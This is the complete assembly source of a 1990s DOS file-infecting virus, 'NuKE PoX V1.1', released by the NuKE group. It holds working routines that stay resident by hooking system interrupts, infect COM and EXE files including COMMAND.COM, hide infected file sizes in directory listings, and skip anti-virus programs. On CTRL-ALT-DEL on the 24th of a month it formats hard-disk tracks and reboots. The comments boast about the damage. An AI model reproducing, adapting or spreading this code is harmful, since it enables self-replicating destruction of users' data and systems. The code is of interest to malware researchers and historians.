;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ;-* (c) Rock Steady, Viral Developments -* ;*- (c) NuKE Software Developement 1991, 1992 *- ;-* Virus: NuKE PoX Version 1.1 (Alias: Evil Genius, NPox) -* ;*- ~~~~~~ *- ;-* Notes: Resident EXE & COM Infecting, Memory Stealth, Directory -* ;*- ~~~~~~ Stealth (FCB Method), Anti-Viral Products Aware, Infects *- ;-* COMMAND.COM on first Run, CTRL-ALT-DEL Aware... -* ;*- Bytes: 963 Bytes Memory: 963 Bytes *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* virus_size equ last - init_virus mut1 equ 3 mut2 equ 1 mut3 equ 103h del_code equ 53h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h rocko proc far start: jmp init_virus ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Virus Begins Here... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- init_virus: call doit_now ;Doit VirusMan... doit_now: pop bp ;Not to Lose Track sub bp,106h ;Set our position push ax ;Save all the registers push bx push cx push dx push si push di push bp push es push ds mov ax,7bcdh ;Are we resident Already? int 21h cmp bx,7bcdh ;Yupe... Quit Then... je exit_com xor bx,bx push cs ;Get CS=DS pop ds mov cx,es mov ax,3509h ;Hook Int 9 Please... int 21h mov word ptr cs:[int9+2][bp],es mov word ptr cs:[int9][bp],bx mov ax,3521h ;Sometimes tend to intercept int 21h ;This Interrupt... mov word ptr cs:[int21+2][bp],es ;Save the Int mov word ptr cs:[int21][bp],bx ;Vector Table dec cx ;Get a new Memory block mov es,cx ;Put it Back to ES mov bx,es:mut1 mov dx,virus_size ;Size to `Hide' mov cl,4 ;And all this crap hides shr dx,cl ;your number od bytes in DX add dx,4 mov cx,es sub bx,dx inc cx mov es,cx mov ah,4ah ;Call int to do it... int 21h jc exit_com mov ah,48h dec dx mov bx,dx ;It's Done... Yeah! int 21h jc exit_com dec ax mov es,ax mov cx,8h ;Here we move our Virus into mov es:mut2,cx ;the `Hidden' memory! sub ax,0fh mov di,mut3 mov es,ax mov si,bp add si,offset init_virus mov cx,virus_size cld repne movsb mov ax,2521h ;Restore Int21 with ours mov dx,offset int21_handler ;Where it starts push es pop ds int 21h mov ax,2509h ;Restore Int9 with ours mov dx,offset int9_handler ;The Handler... int 21h push cs pop ds exit_com: cmp word ptr cs:[buffer][bp],5A4Dh je exit_exe_file ;Its an EXE file... mov bx,offset buffer ;Its a COM file restore add bx,bp ;First three Bytes... mov ax,[bx] ;Mov the Byte to AX mov word ptr ds:[100h],ax ;First two bytes Restored add bx,2 ;Get the next Byte mov al,[bx] ;Move the Byte to AL mov byte ptr ds:[102h],al ;Restore the Last of 3 Bytes pop ds pop es pop bp ;Restore Regesters pop di pop si pop dx pop cx pop bx pop ax mov ax,100h ;Jump Back to Beginning push ax ;Restores our IP (a CALL retn ;Saves them, now we changed int21 dd ? ;Our Old Int21 int9 dd ? ;Our Old Int9 exit_exe_file: mov bx,word ptr cs:[buffer+22][bp] ;Load CS Regester mov dx,cs sub dx,bx mov ax,dx add ax,word ptr cs:[exe_cs][bp] ;Get original CS add dx,word ptr cs:[exe_ss][bp] ;Get original SS mov bx,word ptr cs:[exe_ip][bp] ;Get original IP mov word ptr cs:[fuck_yeah][bp],bx ;Restore IP mov word ptr cs:[fuck_yeah+2][bp],ax ;Restore CS mov ax,word ptr cs:[exe_sp][bp] ;Get original SP mov word ptr cs:[Rock_Fix1][bp],dx ;Restore SS mov word ptr cs:[Rock_Fix2][bp],ax ;Restore SP pop ds pop es pop bp pop di pop si pop dx pop cx pop bx pop ax db 0B8h ;This is now a MOV AX,XXXX Rock_Fix1: ;XXXX is the original SS dw 0 ;Our XXXX Value cli ;Disable Interrupts mov ss,ax ;Mov it to SS db 0BCh ;This is now a MOV SP,XXXX Rock_Fix2: dw 0 ;The XXXX Value for SP sti ;Enable interrupts db 0EAh ;JMP XXXX:YYYY fuck_yeah: dd 0 ;Dword IP:CS (Reverse order! ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Int 9 Handler ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- int9_handler: ;Every TIME a KEY is pressed push ax ;This ROUTINE is called! in al,60h ;Has the user attempted a cmp al,del_code ;CTRL-ALT-DEL je warm_reboot ;Yes! Screw him bye_bye: pop ax jmp dword ptr cs:[int9] ;Nope, Leave system alone warm_reboot: mov ah,2ah ;Get Date Please int 21h cmp dl,18h ;Is it 24th of the Month? jne bye_bye ;Yes, bye_Bye HD mov ch,0 hurt_me: mov ah,05h mov dh,0 mov dl,80h ;Formats a few tracks... int 13h ;Hurts So good... inc ch cmp ch,20h loopne hurt_me db 0eah,0f0h,0ffh,0ffh,0ffh ;Reboot! iret ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Dir Handler ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- dir_handler: pushf push cs call int21call ;Get file Stats test al,al ;Good FCB? jnz no_good ;nope push ax push bx push es mov ah,51h ;Is this Undocmented? huh... int 21h mov es,bx cmp bx,es:[16h] jnz not_infected ;Not for us man... mov bx,dx mov al,[bx] push ax mov ah,2fh ;Get file DTA int 21h pop ax inc al jnz fcb_okay add bx,7h fcb_okay: mov ax,es:[bx+17h] and ax,1fh ;UnMask Seconds Field xor al,1dh ;Is in 58 seconds? jnz not_infected ;Nope... and byte ptr es:[bx+17h],0e0h sub es:[bx+1dh],virus_size ;Yes minus virus size sbb es:[bx+1fh],ax not_infected: pop es pop bx pop ax no_good: iret ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Int 21 Handler ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- int21_handler: cmp ax,4b00h ;File executed je execute cmp ah,11h ;Dir handler je dir_handler cmp ah,12h ;Next file Dir handler je dir_handler cmp ax,7bcdh ;Virus testing jne int21call jmp execute int21call: jmp dword ptr cs:[int21] ;Split... execute: push ax push bx push cx push dx push si push di push es push ds cmp ax,7bcdh ;Was Virus testing if it was jne continue ;Alive? If No Continue push cs pop ds ;If Yes, Check if COMMAND.CO mov dx,offset command ;Is infected! And return jmp continue2 continue: call check_name ;Make sure file executed jc exit_now ;Ain't a Anti-Viral program continue2: ;With the CRC-32 checkers mov ax,4300h ;Get file Attribs int 21h jc exit test cl,1h ;Make sure there normal jz open_file ;Okay there are and cl,0feh ;Nope, Fix them... mov ax,4301h ;Save them now int 21h jc exit open_file: mov ax,3D02h int 21h ;Open File to Infect please jc exit ;Error Split mov bx,ax ;BX File handler mov ax,5700h ;Get file TIME + DATE int 21h mov al,cl or cl,1fh ;Un mask Seconds dec cx ;60 seconds dec cx ;58 seconds xor al,cl ;Is it 58 seconds? jz exit ;File already infected push cs pop ds mov word ptr ds:[old_time],cx ;Save Time mov word ptr ds:[old_date],dx ;Save Date mov ah,3Fh mov cx,20h mov dx,offset ds:[buffer] ;Read first 20h bytes int 21h jc exit_now ;Error Split mov ax,4202h ;Move file pointer to end of xor cx,cx ;file... xor dx,dx int 21h jc exit_now ;Error Split cmp word ptr cs:[buffer],5A4Dh ;Is file an EXE? je exe_file ;JMP to EXE Infector mov cx,ax sub cx,3 ;Set the JMP mov word ptr cs:[jump_address+1],cx call infect_me ;Infect! jc exit_now ;error split mov ah,40h ;Write back the firs mov dx,offset ds:[jump_address] ;bytes mov cx,3h int 21h exit_now: mov cx,word ptr cs:[old_time] ;Restore old time mov dx,word ptr cs:[old_date] ;Restore Old date mov ax,5701h int 21h exit_now2: mov ah,3Eh int 21h ;Close File now... exit: pop ds pop es pop di pop si pop dx pop cx pop bx pop ax cmp ax,7bcdh ;Virus checking if alive jne leave_now ;No, Exit normally mov bx,ax ;Yes, Fix BX with codez leave_now: jmp dword ptr cs:[int21] ;Jmp back to whatever exe_file: mov cx,word ptr cs:[buffer+20] ;IP Regester mov word ptr cs:[exe_ip],cx ;Save IP Regester mov cx,word ptr cs:[buffer+22] ;CS Regester mov word ptr cs:[exe_cs],cx ;Save CS Regester mov cx,word ptr cs:[buffer+16] ;SP Regester mov word ptr cs:[exe_sp],cx ;Save SP Regester mov cx,word ptr cs:[buffer+14] ;SS Regester mov word ptr cs:[exe_ss],cx ;Save SS Regester push ax push dx call multiply ;Figure a new CS:IP sub dx,word ptr cs:[buffer+8] mov word ptr cs:[buffer+22],dx ;Restore New CS mov word ptr cs:[buffer+20],ax ;Restore New IP pop dx pop ax add ax,virus_size adc dx,0 push ax push dx call multiply ;Figure a new SS:SP sub dx,word ptr cs:[buffer+8] ;Exe Size (512 Usuall add ax,40h mov word ptr cs:[buffer+14],dx ;New SS Pointer mov word ptr cs:[buffer+16],ax ;New SP Pointer pop dx pop ax push bx push cx mov cl,7 ;Fix for Header for shl dx,cl ;new file size in 512 ;byte pages mov bx,ax mov cl,9 ;And the remainder shr bx,cl ;after dividing by ;512... add dx,bx and ax,1FFh jz outta_here inc dx outta_here: pop cx pop bx mov word ptr cs:[buffer+2],ax ;Save Remainder mov word ptr cs:[buffer+4],dx ;Save Size in 512 pag call infect_me ;INFECT File! Yeah! jc exit_exe mov ah,40h ;Write NEW EXE Header back mov dx,offset ds:[buffer] ;to EXE File! Points to mov cx,20h ;The Virus Now!!! ehhe int 21h exit_exe: jmp exit_now rocko endp exe_ip dw 0 ;Original IP,CS,SP,SS From EXE exe_cs dw 0 ;Header! exe_sp dw 0 exe_ss dw 0 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Infection Routine... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- infect_me proc near mov ah,40h ;Write the New Encrypted mov dx,offset init_virus ;Virus to File! mov cx,virus_size int 21h jc exit_error ;Error Split mov ax,4200h xor cx,cx ;Pointer back to beginning xor dx,dx ;file! int 21h jc exit_error ;Split Dude... clc ;Clear carry flag retn exit_error: stc ;Set carry flag retn infect_me endp ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Fix EXE Header...Gets new SS, CS Values for EXEs headers ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- multiply proc near push bx push cx mov cl,0Ch shl dx,cl mov bx,ax mov cl,4 shr bx,cl add dx,bx and ax,0Fh pop cx pop bx retn multiply endp ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Check to see if an `Anti-Viral' Product is being executed. ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- check_name proc near push si push cx mov si,dx mov cx,128h loop_me: cmp byte ptr ds:[si],2Eh ;Find ASCIIZ String je next_ok inc si loop loop_me next_ok: cmp ds:[si-2],'TO' ;Is it ??PROT.EXE (F-PROT) jne next_1 ;Naaa cmp ds:[si-4],'RP' je bad_file ;Yupe... next_1: cmp ds:[si-2],'NA' ;Is it SCAN.EXE (McAffee) jne next_2 ;Naaa cmp ds:[si-4],'CS' je bad_file ;Yupe... next_2: cmp ds:[si-2],'NA' ;is it ?LEAN.EXE (Clean.EXE jne next_3 ;Naaa cmp ds:[si-4],'EL' je bad_file ;Yupe... next_3: pop cx pop si ;good file Set CARRY FLAG clc ;to normal retn bad_file: pop cx ;Bad file, Set CARRY FLAG pop si ;ON!!! stc retn check_name endp command db "C:\COMMAND.COM",0 ;What to infect! old_time dw ? old_date dw ? jump_address db 0E9h,90h,90h buffer db 90h,0CDh,020h db 30h DUP (?) msg db "NukE PoX V1.1 - R.S" last: seg_a ends end start